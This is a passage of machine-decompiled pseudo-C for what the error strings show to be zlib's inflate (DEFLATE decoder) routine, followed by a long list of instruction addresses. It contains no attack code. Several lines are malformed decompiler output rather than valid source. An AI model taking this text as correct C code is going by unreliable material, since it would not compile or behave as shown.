									__eflags = __eax;
									if(__eax == 0) {
										goto L322;
									}
									L175:
									__eax = memcpy( *(__ebp - 0x1c),  *(__ebp - 8), __eax);
									__eax =  *(__ebp - 0x34);
									__esp = __esp + 0xc;
									__ecx =  *(__ebp - 4);
									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
									__ecx =  *(__ebp - 4) - __eax;
									 *(__ebp - 0x18) =  *(__ebp - 0x18) - __eax;
									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + __eax;
									__ebx[0x10] = __ebx[0x10] - __eax;
									__edx =  *(__ebp - 0xc);
									 *(__ebp - 4) = __ecx;
									goto L135;
								case 0x10:
									goto L0;
								case 0x11:
									while(1) {
										L189:
										__eflags = _t920[0x1a] - _t920[0x17];
										if(_t920[0x1a] >= _t920[0x17]) {
											break;
										}
										L184:
										__eflags = _t1103 - 3;
										if(_t1103 >= 3) {
											L188:
											_t944 = _t1054 & 0x00000007;
											_t1054 = _t1054 >> 3;
											 *(_t1164 - 0xc) = _t1054;
											 *(_t920 + 0x70 + ( *(0x1324908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = _t944;
											_t920[0x1a] = _t920[0x1a] + 1;
											_t1103 = _t1103 - 3;
											__eflags = _t1103;
											_t928 =  *(_t1164 - 4);
											 *(_t1164 - 0x10) = _t1103;
											continue;
										}
										L185:
										_t804 =  *(_t1164 - 8);
										while(1) {
											L186:
											__eflags = _t928;
											if(_t928 == 0) {
												goto L322;
											}
											L187:
											 *(_t1164 - 4) = _t928 - 1;
											_t806 = ( *_t804 & 0x000000ff) << _t1103;
											_t1103 = _t1103 + 8;
											_t928 =  *(_t1164 - 4);
											_t1054 = _t1054 + _t806;
											_t804 =  &(( *(_t1164 - 8))[1]);
											 *(_t1164 - 0xc) = _t1054;
											 *(_t1164 - 8) = _t804;
											__eflags = _t1103 - 3;
											if(_t1103 < 3) {
												continue;
											}
											goto L188;
										}
										goto L322;
									}
									L190:
									while(1) {
										L192:
										__eflags = _t920[0x1a] - 0x13;
										if(_t920[0x1a] >= 0x13) {
											break;
										}
										L191:
										 *(_t920 + 0x70 + ( *(0x1324908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = 0;
										_t368 =  &(_t920[0x1a]);
										 *_t368 = _t920[0x1a] + 1;
										__eflags =  *_t368;
									}
									L193:
									_t810 =  &(_t920[0x14c]);
									_t920[0x13] = _t810;
									_t920[0x1b] = _t810;
									_t920[0x15] = 7;
									_t813 = E013233B4(0,  &(_t920[0x1c]), 0x13,  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
									_t1166 = _t1166 + 0x18;
									 *(_t1164 - 0x20) = _t813;
									__eflags = _t813;
									if(_t813 == 0) {
										L196:
										_t920[0x1a] = _t920[0x1a] & 0x00000000;
										 *_t920 = 0x12;
										goto L224;
									}
									L194:
									_t1125[6] = "invalid code lengths set";
									goto L195;
								case 0x12:
									while(1) {
										L224:
										_t949 = _t920[0x1a];
										 *(_t1164 - 0x2c) = _t949;
										__eflags = _t949 - _t920[0x19] + _t920[0x18];
										if(_t949 < _t920[0x19] + _t920[0x18]) {
											goto L199;
										} else {
											break;
										}
										while(1) {
											L199:
											_t817 =  *((intOrPtr*)(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4));
											 *(_t1164 - 0x34) = _t817;
											__eflags = (_t817 >> 0x00000008 & 0x000000ff) - _t1103;
											if((_t817 >> 0x00000008 & 0x000000ff) <= _t1103) {
												break;
											}
											L197:
											_t935 =  *(_t1164 - 4);
											__eflags = _t935;
											if(_t935 == 0) {
												goto L323;
											}
											L198:
											_t1072 =  *(_t1164 - 8);
											 *(_t1164 - 4) = _t935 - 1;
											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1072 & 0x000000ff) << _t1103);
											 *(_t1164 - 8) =  &(_t1072[1]);
											_t1103 = _t1103 + 8;
											__eflags = _t1103;
										}
										L200:
										_push(0x10);
										_t1075 = _t817 >> 0x10;
										_pop(_t956);
										__eflags = _t1075 - _t956;
										if(__eflags >= 0) {
											L202:
											if(__eflags != 0) {
												L208:
												_t1076 =  *(_t1164 - 0xc);
												_push(0x11);
												_pop(_t957);
												__eflags =  *(_t1164 - 0x32) - _t957;
												_t958 = _t817 & 0x000000ff;
												if( *(_t1164 - 0x32) != _t957) {
													L214:
													 *(_t1164 - 0x10) = _t958;
													while(1) {
														L215:
														_t432 = _t958 + 7; // 0x18
														__eflags = _t1103 - _t432;
														if(_t1103 >= _t432) {
															break;
														}
														L216:
														_t935 =  *(_t1164 - 4);
														__eflags = _t935;
														if(_t935 == 0) {
															goto L323;
														}
														L217:
														 *(_t1164 - 4) = _t935 - 1;
														_t958 =  *(_t1164 - 0x10);
														_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
														 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
														_t1103 = _t1103 + 8;
														 *(_t1164 - 0xc) = _t1076;
													}
													L218:
													_t1077 = _t1076 >> _t958;
													_t1078 = _t1077 >> 7;
													_push(0xfffffff9);
													_pop(_t821);
													_t961 = (_t1077 & 0x0000007f) + 0xb;
													_t822 = _t821 -  *(_t1164 - 0x10);
													__eflags = _t822;
													L219:
													 *(_t1164 - 0x34) =  *(_t1164 - 0x34) & 0x00000000;
													_t1103 = _t1103 + _t822;
													__eflags = _t1103;
													L220:
													 *(_t1164 - 0x30) = _t961;
													 *(_t1164 - 0xc) = _t1078;
													 *(_t1164 - 0x10) = _t1103;
													__eflags = _t961 +  *(_t1164 - 0x2c) - _t920[0x19] + _t920[0x18];
													if(_t961 +  *(_t1164 - 0x2c) > _t920[0x19] + _t920[0x18]) {
														L227:
														_t1125[6] = "invalid bit length repeat";
														 *_t920 = 0x1d;
														L228:
														__eflags =  *_t920 - 0x1d;
														if( *_t920 == 0x1d) {
															L133:
															_t1054 =  *(_t1164 - 0xc);
															goto L134;
														}
														L229:
														__eflags = _t920[0x9c];
														if(_t920[0x9c] != 0) {
															L231:
															_t826 =  &(_t920[0x14c]);
															_t920[0x13] = _t826;
															_t920[0x1b] = _t826;
															_t920[0x15] = 9;
															_t829 = E013233B4(1,  &(_t920[0x1c]), _t920[0x18],  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
															_t1166 = _t1166 + 0x18;
															 *(_t1164 - 0x20) = _t829;
															__eflags = _t829;
															if(_t829 == 0) {
																L233:
																_t920[0x14] = _t920[0x1b];
																_t920[0x16] = 6;
																_t835 = E013233B4(2, _t920 + (_t920[0x18] + 0x38) * 2, _t920[0x19],  &(_t920[0x1b]),  &(_t920[0x16]),  &(_t920[0xbc]));
																_t1166 = _t1166 + 0x18;
																 *(_t1164 - 0x20) = _t835;
																__eflags = _t835;
																if(_t835 == 0) {
																	L235:
																	__eflags =  *((intOrPtr*)(_t1164 + 0xc)) - 6;
																	_t935 =  *(_t1164 - 4);
																	 *_t920 = 0x13;
																	if( *((intOrPtr*)(_t1164 + 0xc)) == 6) {
																		goto L323;
																	}
																	L236:
																	_t1081 =  *(_t1164 - 0xc);
																	goto L237;
																}
																L234:
																_t1125[6] = "invalid distances set";
																L195:
																 *_t920 = 0x1d;
																goto L133;
															}
															L232:
															_t1125[6] = "invalid literal/lengths set";
															goto L195;
														}
														L230:
														_t1125[6] = "invalid code -- missing end-of-block";
														goto L195;
													}
													L221:
													_t1036 =  *(_t1164 - 0x30);
													__eflags = _t1036;
													if(_t1036 == 0) {
														continue;
													}
													L222:
													_t1098 =  *(_t1164 - 0x34);
													do {
														L223:
														 *(_t920 + 0x70 + _t920[0x1a] * 2) = _t1098;
														_t920[0x1a] = _t920[0x1a] + 1;
														_t1036 = _t1036 - 1;
														__eflags = _t1036;
													} while (_t1036 != 0);
													continue;
												}
												L209:
												 *(_t1164 - 0x10) = _t958;
												while(1) {
													L210:
													_t422 = _t958 + 3; // 0x14
													__eflags = _t1103 - _t422;
													if(_t1103 >= _t422) {
														break;
													}
													L211:
													_t935 =  *(_t1164 - 4);
													__eflags = _t935;
													if(_t935 == 0) {
														goto L323;
													}
													L212:
													 *(_t1164 - 4) = _t935 - 1;
													_t958 =  *(_t1164 - 0x10);
													_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
													 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
													_t1103 = _t1103 + 8;
													 *(_t1164 - 0xc) = _t1076;
												}
												L213:
												_t1099 = _t1076 >> _t958;
												_t1078 = _t1099 >> 3;
												_push(0xfffffffd);
												_pop(_t912);
												_t961 = (_t1099 & 0x00000007) + 3;
												_t822 = _t912 -  *(_t1164 - 0x10);
												goto L219;
											}
											L203:
											_t1046 = (_t817 >> 0x00000008 & 0x000000ff) + 2;
											 *(_t1164 - 0x34) = _t1046;
											__eflags = _t1103 - _t1046;
											if(_t1103 >= _t1046) {
												L206:
												_t1047 = _t817 & 0x000000ff;
												_t916 =  *(_t1164 - 0x2c);
												_t1103 = _t1103 - _t1047;
												_t1054 =  *(_t1164 - 0xc) >> _t1047;
												 *(_t1164 - 0xc) = _t1054;
												 *(_t1164 - 0x10) = _t1103;
												__eflags = _t916;
												if(_t916 == 0) {
													L226:
													_t1125[6] = "invalid bit length repeat";
													goto L17;
												}
												L207:
												_t1078 = _t1054 >> 2;
												_t961 = (_t1054 & 0x00000003) + 3;
												 *(_t1164 - 0x34) =  *(_t920 + 0x6e + _t916 * 2) & 0x0000ffff;
												_t1103 = _t1103 - 2;
												goto L220;
											} else {
												goto L204;
											}
											while(1) {
												L204:
												_t935 =  *(_t1164 - 4);
												__eflags = _t935;
												if(_t935 == 0) {
													goto L323;
												}
												L205:
												 *(_t1164 - 4) = _t935 - 1;
												_t1102 = ( *( *(_t1164 - 8)) & 0x000000ff) << _t1103;
												_t1103 = _t1103 + 8;
												 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + _t1102;
												 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
												__eflags = _t1103 -  *(_t1164 - 0x34);
												if(_t1103 <  *(_t1164 - 0x34)) {
													continue;
												}
												goto L206;
											}
											goto L323;
										}
										L201:
										_t1053 = _t817 >> 0x00000008 & 0x000000ff;
										_t1103 = _t1103 - _t1053;
										 *(_t1164 - 0xc) =  *(_t1164 - 0xc) >> _t1053;
										 *(_t1164 - 0x10) = _t1103;
										 *(_t920 + 0x70 +  *(_t1164 - 0x2c) * 2) = _t1075;
										_t920[0x1a] = _t920[0x1a] + 1;
									}
									L225:
									goto L228;
								case 0x13:
									L237:
									 *_t920 = 0x14;
									goto L238;
								case 0x14:
									L238:
									__eflags = _t935 - 6;
									if(_t935 < 6) {
										L242:
										_t920[0x6f1] = _t920[0x6f1] & 0x00000000;
										 *(_t1164 - 0x30) = _t920[0x13];
										_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 & _t1081) * 4);
										while(1) {
											L245:
											__eflags = (_t842 >> 0x00000008 & 0x000000ff) - _t1103;
											if((_t842 >> 0x00000008 & 0x000000ff) <= _t1103) {
												break;
											}
											L243:
											_t935 =  *(_t1164 - 4);
											__eflags = _t935;
											if(_t935 == 0) {
												goto L323;
											}
											L244:
											 *(_t1164 - 4) = _t935 - 1;
											_t971 = _t1103;
											_t1103 = _t1103 + 8;
											 *(_t1164 - 0x10) = _t1103;
											 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
											 *(_t1164 - 0xc) = _t1081 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t971);
											__eflags = 1;
											_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
											_t1081 =  *(_t1164 - 0xc);
										}
										L246:
										__eflags = _t842;
										if(_t842 == 0) {
											L252:
											_t975 = _t842 >> 0x00000008 & 0x000000ff;
											_t920[0x6f1] = _t920[0x6f1] + _t975;
											_t1103 = _t1103 - _t975;
											_t1054 = _t1081 >> _t975;
											 *(_t1164 - 0xc) = _t1054;
											 *(_t1164 - 0x10) = _t1103;
											_t920[0x10] = _t842 >> 0x10;
											__eflags = _t842;
											if(_t842 != 0) {
												L254:
												__eflags = _t842 & 0x00000020;
												if((_t842 & 0x00000020) == 0) {
													L256:
													_t928 =  *(_t1164 - 4);
													__eflags = _t842 & 0x00000040;
													if((_t842 & 0x00000040) == 0) {
														L258:
														_t848 = _t842 & 0xf;
														__eflags = _t848;
														 *_t920 = 0x15;
														_t920[0x12] = _t848;
														goto L259;
													}
													L257:
													_t1125[6] = "invalid literal/length code";
													goto L31;
												}
												L255:
												_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
												 *_t920 = 0xb;
												goto L134;
											}
											L253:
											 *_t920 = 0x19;
											goto L134;
										}
										L247:
										__eflags = _t842 & 0x000000f0;
										if((_t842 & 0x000000f0) != 0) {
											goto L252;
										}
										L248:
										_t926 = _t842 >> 8;
										_t1096 = _t842;
										 *(_t1164 - 0x34) = _t1096;
										_t842 =  *( *(_t1164 - 0x30) + ((((1 << (_t842 & 0x000000ff) + (_t926 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t926 & 0x000000ff)) + (_t842 >> 0x10)) * 4);
										_t1103 =  *(_t1164 - 0x10);
										_t920 =  *(_t1164 - 0x24);
										__eflags = (_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) - _t1103;
										if((_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) <= _t1103) {
											L251:
											_t1125 =  *(_t1164 + 8);
											_t1025 = _t1096 & 0x000000ff;
											_t1081 =  *(_t1164 - 0xc) >> _t1025;
											_t1103 = _t1103 - _t1025;
											__eflags = _t1103;
											_t920[0x6f1] = _t1025;
											goto L252;
										} else {
											goto L249;
										}
										while(1) {
											L249:
											_t1153 =  *(_t1164 - 4);
											__eflags = _t1153;
											if(_t1153 == 0) {
												goto L322;
											}
											L250:
											 *(_t1164 - 4) = _t1153 - 1;
											_t1155 =  *(_t1164 - 8);
											 *(_t1164 - 0x10) = _t1103 + 8;
											_t1124 = _t1096 & 0x000000ff;
											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1155 & 0x000000ff) << _t1103);
											 *(_t1164 - 8) =  &(_t1155[1]);
											_t842 =  *(_t920[0x13] + ((((1 << (_t1096 & 0x000000ff) + _t1124) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1124) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
											_t1103 =  *(_t1164 - 0x10);
											__eflags = (_t842 >> 0x00000008 & 0x000000ff) + _t1124 - _t1103;
											if((_t842 >> 0x00000008 & 0x000000ff) + _t1124 > _t1103) {
												continue;
											}
											goto L251;
										}
										goto L322;
									}
									L239:
									_t901 =  *(_t1164 - 0x18);
									__eflags = _t901 - 0x102;
									if(_t901 < 0x102) {
										goto L242;
									}
									L240:
									_push( *((intOrPtr*)(_t1164 - 0x28)));
									_t1125[3] =  *(_t1164 - 0x1c);
									_t920 =  *(_t1164 - 0x24);
									_t1125[4] = _t901;
									 *_t1125 =  *(_t1164 - 8);
									_t1125[1] = _t935;
									_push(_t1125);
									_t920[0xe] = _t1081;
									_t920[0xf] = _t1103;
									E01323840();
									__eflags =  *_t920 - 0xb;
									_t1054 = _t920[0xe];
									_t1103 = _t920[0xf];
									 *(_t1164 - 0x1c) = _t1125[3];
									_t928 = _t1125[1];
									 *(_t1164 - 0x18) = _t1125[4];
									 *(_t1164 - 8) =  *_t1125;
									 *(_t1164 - 4) = _t928;
									 *(_t1164 - 0xc) = _t1054;
									 *(_t1164 - 0x10) = _t1103;
									if( *_t920 == 0xb) {
										_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
									}
									goto L135;
								case 0x15:
									L259:
									_t1129 = _t920[0x12];
									__eflags = _t1129;
									if(_t1129 == 0) {
										L265:
										_t920[0x6f2] = _t920[0x10];
										 *_t920 = 0x16;
										goto L266;
									}
									L260:
									__eflags = _t1103 - _t1129;
									if(_t1103 >= _t1129) {
										L264:
										_t1015 = _t1129;
										_t1103 = _t1103 - _t1129;
										 *(_t1164 - 0x10) = _t1103;
										_t891 = (1 << _t1015) - 0x00000001 & _t1054;
										_t1054 = _t1054 >> _t1015;
										_t920[0x10] = _t920[0x10] + _t891;
										_t580 =  &(_t920[0x6f1]);
										 *_t580 = _t920[0x6f1] + _t1129;
										__eflags =  *_t580;
										 *(_t1164 - 0xc) = _t1054;
										goto L265;
									}
									L261:
									_t892 =  *(_t1164 - 8);
									while(1) {
										L262:
										__eflags = _t928;
										if(_t928 == 0) {
											goto L322;
										}
										L263:
										 *(_t1164 - 4) = _t928 - 1;
										_t894 = ( *_t892 & 0x000000ff) << _t1103;
										_t1103 = _t1103 + 8;
										_t928 =  *(_t1164 - 4);
										_t1054 = _t1054 + _t894;
										_t892 =  &(( *(_t1164 - 8))[1]);
										 *(_t1164 - 0xc) = _t1054;
										 *(_t1164 - 8) = _t892;
										__eflags = _t1103 - _t1129;
										if(_t1103 < _t1129) {
											continue;
										}
										goto L264;
									}
									goto L322;
								case 0x16:
									L266:
									_t1130 = _t920[0x14];
									 *(_t1164 - 0x30) = _t1130;
									_t855 =  *(_t1130 + ((1 << _t920[0x16]) - 0x00000001 & _t1054) * 4);
									__eflags = 0xad - _t1103;
									if(0xad <= _t1103) {
										L270:
										__eflags = _t855 & 0x000000f0;
										if((_t855 & 0x000000f0) != 0) {
											L275:
											_t1125 =  *(_t1164 + 8);
											_t984 = _t855 >> 0x00000008 & 0x000000ff;
											_t920[0x6f1] = _t920[0x6f1] + _t984;
											_t1103 = _t1103 - _t984;
											_t1054 = _t1054 >> _t984;
											 *(_t1164 - 0xc) = _t1054;
											 *(_t1164 - 0x10) = _t1103;
											__eflags = _t855 & 0x00000040;
											if((_t855 & 0x00000040) == 0) {
												L277:
												 *_t920 = 0x17;
												_t857 = _t855 & 0xf;
												__eflags = _t857;
												_t920[0x11] = _t855 >> 0x10;
												_t920[0x12] = _t857;
												goto L278;
											}
											L276:
											_t1125[6] = "invalid distance code";
											goto L17;
										}
										L271:
										_t924 = _t855 >> 8;
										_t1088 = _t855;
										 *(_t1164 - 0x34) = _t1088;
										_t855 =  *( *(_t1164 - 0x30) + ((((1 << (_t855 & 0x000000ff) + (_t924 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t924 & 0x000000ff)) + (_t855 >> 0x10)) * 4);
										_t1103 =  *(_t1164 - 0x10);
										_t920 =  *(_t1164 - 0x24);
										__eflags = (_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) - _t1103;
										if((_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) <= _t1103) {
											L274:
											_t1001 = _t1088 & 0x000000ff;
											_t1103 = _t1103 - _t1001;
											_t1054 =  *(_t1164 - 0xc) >> _t1001;
											_t626 =  &(_t920[0x6f1]);
											 *_t626 = _t920[0x6f1] + _t1001;
											__eflags =  *_t626;
											goto L275;
										} else {
											goto L272;
										}
										while(1) {
											L272:
											_t1138 =  *(_t1164 - 4);
											__eflags = _t1138;
											if(_t1138 == 0) {
												goto L322;
											}
											L273:
											 *(_t1164 - 4) = _t1138 - 1;
											_t1140 =  *(_t1164 - 8);
											 *(_t1164 - 0x10) = _t1103 + 8;
											_t1115 = _t1088 & 0x000000ff;
											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1140 & 0x000000ff) << _t1103);
											 *(_t1164 - 8) =  &(_t1140[1]);
											_t855 =  *(_t920[0x14] + ((((1 << (_t1088 & 0x000000ff) + _t1115) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1115) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
											_t1103 =  *(_t1164 - 0x10);
											__eflags = (_t855 >> 0x00000008 & 0x000000ff) + _t1115 - _t1103;
											if((_t855 >> 0x00000008 & 0x000000ff) + _t1115 > _t1103) {
												continue;
											}
											goto L274;
										}
										goto L322;
									}
									L267:
									_t1149 =  *(_t1164 - 4);
									while(1) {
										L268:
										__eflags = _t1149;
										if(_t1149 == 0) {
											goto L322;
										}
										L269:
										_t1010 = _t1103;
										_t1149 = _t1149 - 1;
										_t1103 = _t1103 + 8;
										 *(_t1164 - 4) = _t1149;
										 *(_t1164 - 0x10) = _t1103;
										 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
										 *(_t1164 - 0xc) = _t1054 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1010);
										_t855 =  *(_t920[0x14] + ((1 << _t920[0x16]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
										_t1054 =  *(_t1164 - 0xc);
										__eflags = (_t855 >> 0x00000008 & 0x000000ff) - _t1103;
										if((_t855 >> 0x00000008 & 0x000000ff) > _t1103) {
											continue;
										}
										goto L270;
									}
									goto L322;
								case 0x17:
									L278:
									_t987 = _t920[0x12];
									__eflags = _t987;
									if(_t987 == 0) {
										L284:
										 *_t920 = 0x18;
										goto L285;
									}
									L279:
									__eflags = _t1103 - _t987;
									if(_t1103 >= _t987) {
										L283:
										_t1103 = _t1103 - _t987;
										 *(_t1164 - 0x10) = _t1103;
										_t873 = (1 << _t987) - 0x00000001 & _t1054;
										_t1054 = _t1054 >> _t987;
										_t920[0x11] = _t920[0x11] + _t873;
										_t649 =  &(_t920[0x6f1]);
										 *_t649 = _t920[0x6f1] + _t987;
										__eflags =  *_t649;
										 *(_t1164 - 0xc) = _t1054;
										goto L284;
									}
									L280:
									_t874 =  *(_t1164 - 8);
									while(1) {
										L281:
										_t935 =  *(_t1164 - 4);
										__eflags = _t935;
										if(_t935 == 0) {
											goto L323;
										}
										L282:
										 *(_t1164 - 4) = _t935 - 1;
										_t876 = ( *_t874 & 0x000000ff) << _t1103;
										_t1103 = _t1103 + 8;
										_t987 = _t920[0x12];
										_t1054 = _t1054 + _t876;
										_t874 =  &(( *(_t1164 - 8))[1]);
										 *(_t1164 - 0xc) = _t1054;
										 *(_t1164 - 8) = _t874;
										__eflags = _t1103 - _t987;
										if(_t1103 < _t987) {
											continue;
										}
										goto L283;
									}
									goto L323;
								case 0x18:
									L285:
									_t988 =  *(_t1164 - 0x18);
									__eflags = _t988;
									if(_t988 == 0) {
										goto L322;
									}
									L286:
									_t859 =  *((intOrPtr*)(_t1164 - 0x28)) - _t988;
									_t989 = _t920[0x11];
									__eflags = _t989 - _t859;
									if(_t989 <= _t859) {
										L295:
										_t861 =  *(_t1164 - 0x1c) - _t989;
										__eflags = _t861;
										 *(_t1164 - 0x34) = _t861;
										_t862 = _t920[0x10];
										L296:
										_t990 = _t862;
										L297:
										_t1131 =  *(_t1164 - 0x18);
										__eflags = _t990 - _t1131;
										_t991 =  >  ? _t1131 : _t990;
										 *(_t1164 - 0x18) = _t1131 - _t991;
										_t920[0x10] = _t862 - _t991;
										_t922 =  *(_t1164 - 0x1c);
										_t1134 =  *(_t1164 - 0x34) - _t922;
										__eflags = _t1134;
										do {
											L298:
											 *_t922 = _t922[_t1134];
											_t922 =  &(_t922[1]);
											_t991 = _t991 - 1;
											__eflags = _t991;
										} while (_t991 != 0);
										_t1125 =  *(_t1164 + 8);
										 *(_t1164 - 0x1c) = _t922;
										_t920 =  *(_t1164 - 0x24);
										__eflags = _t920[0x10] - _t991;
										if(_t920[0x10] == _t991) {
											 *_t920 = 0x14;
										}
										goto L134;
									}
									L287:
									_t990 = _t989 - _t859;
									__eflags = _t990 - _t920[0xb];
									if(_t990 <= _t920[0xb]) {
										L290:
										_t865 = _t920[0xd];
										__eflags = _t990 - _t920[0xc];
										if(_t990 <= _t920[0xc]) {
											_t867 = _t865 - _t990 + _t920[0xc];
											__eflags = _t867;
										} else {
											_t990 = _t990 - _t920[0xc];
											_t867 = _t865 + _t920[0xa] - _t990;
										}
										 *(_t1164 - 0x34) = _t867;
										_t862 = _t920[0x10];
										__eflags = _t990 - _t862;
										if(_t990 <= _t862) {
											goto L297;
										} else {
											L294:
											goto L296;
										}
									}
									L288:
									__eflags = _t920[0x6f0];
									if(_t920[0x6f0] == 0) {
										goto L290;
									}
									L289:
									_t1125[6] = "invalid distance too far back";
									goto L17;
								case 0x19:
									L301:
									__eflags =  *(__ebp - 0x18);
									if( *(__ebp - 0x18) == 0) {
										goto L322;
									}
									L302:
									__esi =  *(__ebp - 0x1c);
									__al = __ebx[0x10];
									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + 1;
									 *(__ebp - 0x18) =  *(__ebp - 0x18) - 1;
									 *( *(__ebp - 0x1c)) = __al;
									__esi =  *(__ebp + 8);
									 *__ebx = 0x14;
									goto L135;
								case 0x1a:
									L303:
									__eflags = __ebx[2];
									if (__ebx[2] == 0) goto L306;
									__eflags =  *(__ebp - 0x7d000000) & __bh;
								case 0x1b:
									L307:
									__eax = 0;
									__eflags = __ebx[2];
									if(__ebx[2] == 0) {
										L318:
										 *__ebx = 0x1c;
										goto L319;
									}
									L308:
									__eflags = __ebx[4];
									if(__ebx[4] == 0) {
										goto L318;
									}
									L309:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L314:
										__eflags = __edx - __ebx[7];
										if(__edx == __ebx[7]) {
											L317:
											 *(__ebp - 0xc) = __eax;
											__edi = __eax;
											goto L318;
										}
										L315:
										 *(__esi + 0x18) = "incorrect length check";
										L17:
										 *_t920 = 0x1d;
										L134:
										_t928 =  *(_t1164 - 4);
										goto L135;
									}
									L310:
									__eax =  *(__ebp - 8);
									while(1) {
										L311:
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L322;
										}
										L312:
										__eax =  *__eax & 0x000000ff;
										 *(__ebp - 4) = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebp - 4);
										__edx = __edx + __eax;
										__eax =  *(__ebp - 8);
										__eax =  *(__ebp - 8) + 1;
										 *(__ebp - 0xc) = __edx;
										 *(__ebp - 8) = __eax;
										 *(__ebp - 0x10) = __edi;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										L313:
										__eax = 0;
										__eflags = 0;
										goto L314;
									}
									goto L322;
								case 0x1c:
									L319:
									__eax = 0;
									__eax = 1;
									goto L321;
								case 0x1d:
									L320:
									_push(0xfffffffd);
									_pop(__eax);
									L321:
									 *(__ebp - 0x20) = __eax;
									goto L322;
								case 0x1e:
									goto L330;
							}
						}
						L136:
						_push(0xfffffffe);
						goto L137;
					}
					L181:
					if(_t920[0x19] > 0x1e) {
						goto L183;
					}
					L182:
					_t920[0x1a] = _t920[0x1a] & 0x00000000;
					_t800 = 0x11;
					 *_t920 = _t800;
					goto L189;
				}
			}

0x0132201d
0x0132201d
0x0132201d
0x0132201d
0x0132201d
0x0132201d
0x0132201d
0x0132201d
0x01322020
0x00000000
0x00000000
0x01322022
0x01322022
0x01322025
0x01322025
0x01322027
0x00000000
0x00000000
0x0132202d
0x0132202d
0x01322031
0x01322034
0x01322036
0x01322038
0x0132203b
0x0132203e
0x01322040
0x01322043
0x01322044
0x01322047
0x0132204d
0x00000000
0x00000000
0x00000000
0x0132204d
0x01322a4f
0x01322a4f
0x01322a52
0x01322a52
0x01322a52
0x01322a5b
0x01322a5e
0x01322a61
0x01322a64
0x01322a66
0x01322a6b
0x01322a6e
0x01322a71
0x01322a74
0x01322a7a
0x01322a91
0x01322a9b
0x01322aa5
0x01322ab4
0x01322ab4
0x01322ab6
0x01322ab9
0x01322abc
0x01322abf
0x01322ac2
0x01322ac5
0x01322ac8
0x01322ace
0x01322ad2
0x01322ad7
0x01322ada
0x01322adb
0x01322ae1
0x01322aea
0x01322ae3
0x01322ae3
0x01322ae3
0x01322aef
0x01322af2
0x01322af4
0x01322af4
0x01322ad2
0x01322afa
0x01322b01
0x01322b01
0x00000000
0x01322afc
0x01322afc
0x01322aff
0x01322b06
0x01322b0b
0x01322b12
0x01322b1c
0x01322b22
0x01322b24
0x01322b27
0x01322b2f
0x01322b35
0x01322b39
0x01322b4b
0x01322b4b
0x01321dd3
0x01321dd9
0x01321dd9
0x01322b3b
0x01322b3b
0x01322b42
0x01322b43
0x00000000
0x01322b43
0x01322b31
0x01322b33
0x00000000
0x00000000
0x00000000
0x01322b33
0x00000000
0x01322aff
0x01322afa
0x01322aa7
0x01322aa7
0x01322aad
0x01322aad
0x01321dd2
0x01321dd2
0x00000000
0x01321dd2
0x01322a7c
0x01322a7f
0x00000000
0x00000000
0x01322a81
0x01322a84
0x00000000
0x00000000
0x01322a86
0x01322a89
0x00000000
0x00000000
0x01322a8b
0x01322a8f
0x00000000
0x00000000
0x00000000
0x0132204f
0x01322051
0x01322057
0x0132205f
0x01322062
0x0132206a
0x0132206e
0x01322076
0x0132207c
0x01322086
0x01322089
0x0132209c
0x0132209c
0x01321953
0x01321953
0x01321dc5
0x01321dc5
0x01321dc5
0x01321dca
0x00000000
0x00000000
0x013217be
0x013217be
0x00000000
0x013217c5
0x013217c9
0x013217d6
0x013217d6
0x013217d8
0x013217d9
0x013217db
0x0132180d
0x0132180d
0x01321811
0x01321856
0x01321856
0x0132185a
0x0132185d
0x0132185f
0x01321861
0x01321861
0x01321861
0x01321861
0x01321865
0x01321865
0x01321869
0x01321904
0x01321904
0x00000000
0x01321904
0x0132186f
0x0132187c
0x0132187e
0x01321880
0x01321883
0x01321885
0x01321888
0x00000000
0x00000000
0x0132188a
0x0132188e
0x01321890
0x013218a4
0x013218a4
0x013218a7
0x013218ac
0x013218b2
0x013218b5
0x013218b8
0x013218bc
0x013218f6
0x013218f6
0x013218f9
0x00000000
0x013218fb
0x013218fb
0x00000000
0x013218fb
0x013218be
0x013218be
0x013218c1
0x013218c1
0x013218cb
0x013218ce
